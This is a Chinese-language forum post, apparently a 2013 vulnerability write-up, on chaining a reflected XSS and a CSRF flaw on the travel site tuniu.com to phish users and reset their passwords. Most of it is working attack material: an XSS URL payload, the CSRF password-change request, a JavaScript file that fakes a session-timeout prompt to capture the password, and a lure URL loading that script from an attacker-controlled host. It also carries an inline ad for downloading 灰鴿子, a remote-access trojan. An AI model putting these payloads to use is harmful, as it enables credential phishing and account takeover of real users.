|
記得某次面試時候說起這個利用,但是面試官覺得不可行。我覺得居然用戶能被X也應該有可能被釣,還是有可行性的。
1.jpg (47 KB, 下載次數: 447)
下載附件
灰鴿子
2013-1-28 00:30 上傳
途牛網XSS+CSRF釣魚式重置用戶密碼 灰鴿子下載www.dumiaotech.com
1.某處XSS:http://m.tuniu.com/?action=route ... mp;pdate=<ScRiPt >prompt(/xss/)</ScRiPt>&todo=index
2.修改密碼處CSRF:http://www.tuniu.com/main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1
3.創建外部JS:
2.jpg (13.72 KB, 下載次數: 470)
下載附件
灰鴿子
2013-1-28 00:30 上傳
var pass;
pass=prompt("登陸超時,請重新輸入您的密碼","password");
url="http://www.tuniu.com/main.php?do=user_do_change_password&new=password&pwd_s=1&old="+pass;
window.location=url;
4.誘使用戶訪問
http://m.tuniu.com/?action=route&id=329846&pdate=<ScRiPt/src=//www.your-site.com/1.js></ScRiPt>&todo=index
若用戶輸入其正確密碼,JS內CSRF將會將其密碼重置。
1表示重置成功,0表示重置失敗。
感覺還可以結合一些XSSbypass。
使用其他window彈窗使用戶輸入密碼密文*。
location跳轉也可以改得成其他靜默發送?
|
|